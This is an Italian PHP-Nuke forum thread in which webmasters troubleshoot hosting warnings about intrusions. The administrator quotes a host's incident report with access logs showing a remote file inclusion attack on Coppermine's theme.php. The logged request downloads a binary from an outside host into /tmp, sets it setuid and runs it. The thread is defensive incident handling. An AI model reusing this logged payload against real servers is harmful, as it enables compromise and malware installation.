| Precedente :: Successivo |
| Autore |
Messaggio |
sjmon Newbie


Registrato: Sep 06, 2004 Messaggi: 207
|
Inviato: 22-07-2005 09:30 Oggetto: PROBLEMI DI SICUREZZA CIN ARUBA |
|
|
Salve a tutti; ho installato da qualche tempo Nuke 7.6 (scaricato da phpnukefordonkeys.com-versione Final) e anche Nuke sentinel.
Lo spazio web su cui mi appoggio è aruba e in pochi mesi è gia' la seconda volta che mi anda questa mail:
"Gentile cliente,
Nel dominio a lei intestato e'
stata rilevata un esecuzione di un porgramma
che rimane in ascolto sull'interfaccia di rete del server.
Questa operazione non è consentita e viene da noi considerata come
un tentativo di intrusione nel sistema.
Nel caso non sia lei il responsabile di tale operazione,la
invitiamo a verificare eventuali bug di sicurezza presenti negli script utilizzati.
Nel caso questo evento si ripeta il webmaster verrà avvisato via email,
ed il sito bloccato per evitare ulteriori tentativi.
Saluti cordiali
=============================
Staff Servizio Clienti
Aruba S.p.A. - Aruba.it
============================= "
Non riesco a capire dove puo essere la falla ...qualcuno puo darmi una mano?
Graze Simone |
|
| Torna in cima |
|
 |
robiulia Newbie


Registrato: Sep 04, 2004 Messaggi: 192 Località: Verona (italy)
|
Inviato: 22-07-2005 14:57 Oggetto: |
|
|
| anch' io ho installato la 7.6 final con le varie patches successive e sentinel e non mi è arrivato nessun messaggio del genre quindi non credo dipenda dalla versione di nuke ma forse da qualche modulo attaccabile |
|
| Torna in cima |
|
 |
rino Amministratore


Registrato: Sep 28, 2004 Messaggi: 4615 Località: Anzio
|
Inviato: 22-07-2005 17:02 Oggetto: |
|
|
| per caso hai coppermine o myegallery? |
|
| Torna in cima |
|
 |
robiulia Newbie


Registrato: Sep 04, 2004 Messaggi: 192 Località: Verona (italy)
|
Inviato: 23-07-2005 15:10 Oggetto: |
|
|
| io ho coppermine |
|
| Torna in cima |
|
 |
Crimor Newbie


Registrato: May 30, 2005 Messaggi: 53 Località: Milano
|
Inviato: 04-08-2005 11:06 Oggetto: |
|
|
| robiulia ha scritto: | | io ho coppermine |
Cppermin se non erro non è accettato dai webserver... |
|
| Torna in cima |
|
 |
rino Amministratore


Registrato: Sep 28, 2004 Messaggi: 4615 Località: Anzio
|
Inviato: 04-08-2005 11:30 Oggetto: |
|
|
Sia Myegallery che Coppermine sono vulnerabili e non accettati dai webserver nel momento in cui vengono attaccati non solo il sito ma cosa piu grave per loro il server. Aruba non mi ha indicato tipo e fonte degli attacchi al contrario di Energit Area Server che -per Coppermine, che avevo installato- mi ha inviato questo dettagliato report
| Citazione: | La informiamo che sul Suo Server Virtuale sono stati riscontrati dei
bugs che stavano generando inconvenienti a tutti i Server ospitati sul
V-Host principale attraverso l'installazione di worm nella directory
/tmp, causa di molteplici picchi di traffico sulla rete.
Dagli access_log abbiamo verificato che la causa del bug è il seguente
modulo di Coppermine:
/home/web/www.phpnukemaximus.it/website/maxit//modules/coppermine/themes/default/theme.php
Il nostro Staff Tecnico ha eliminato alcuni file nella directory /tmp
drwxrwxrwt 2 29000 29000 4096 6 lug 08:47 .
drwxr-xr-x 14 root root 4096 27 mag 12:49 ..
-rwsrwxrwx 1 29002 29002 0 6 lug 08:40 bd
-rwsrwxrwx 1 29002 29002 17855 15 apr 07:51 cgi
-rw-r--r-- 1 29002 29002 17855 15 apr 07:51 cgi.1
-rw-r--r-- 1 29002 29002 17855 15 apr 07:51 cgi.2
-rw-r--r-- 1 29002 29002 17855 15 apr 07:51 cgi.3
-rw-r--r-- 1 29002 29002 17855 15 apr 07:51 cgi.4
Di seguito un estratto dei log che potrebbe esserLe utile al fine di
risolvere l'inconveniente:
Error_log
--08:47:09-- http://www.thecurse.pop.com.br/b/cgi
=> `cgi'
Resolving www.thecurse.pop.com.br... done.
Connecting to www.thecurse.pop.com.br[200.175.8.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,855 [text/plain]
0K .......... ....... 100%
33.02 KB/s
08:47:10 (33.02 KB/s) - `cgi' saved [17855/17855]
--08:47:12-- http://www.thecurse.pop.com.br/b/cgi
=> `cgi.1'
Resolving www.thecurse.pop.com.br... done.
Connecting to www.thecurse.pop.com.br[200.175.8.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,855 [text/plain]
0K .......... ....... 100%
32.17 KB/s
Access_log
200.141.220.246 - - [06/Jul/2005:08:47:07 +0200] "GET
/maxit//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www
.ph4nt4sm4.hpgvip.ig.com.br/newcmd.gif.txt?&cmd=id;cd%20/tmp;wget%20www.thecurse.pop.com.br/b/cgi;chmod%204777%20cgi;./cgi
HTT
P/1.1" 200 10793 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.141.220.246 - - [06/Jul/2005:08:47:07 +0200] "GET
/maxit//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www
.ph4nt4sm4.hpgvip.ig.com.br/newcmd.gif.txt?&cmd=id;cd%20/tmp;wget%20www.thecurse.pop.com.br/b/cgi;chmod%204777%20cgi;./cgi
HTT
P/1.1" 200 10793
La invitiamo a porre tempestivamente rimedio al bug segnalato, in
quanto, per ovvie ragioni di sicurezza potremmo disabilitare il Server
Virtuale.
|
Per il momento ho sostituito il modulo Coppermine con la versione standalone che, tra l'altro è più veloce e certamente più sicura oltrechè supportata. |
 |
|
| Torna in cima |
|
 |
|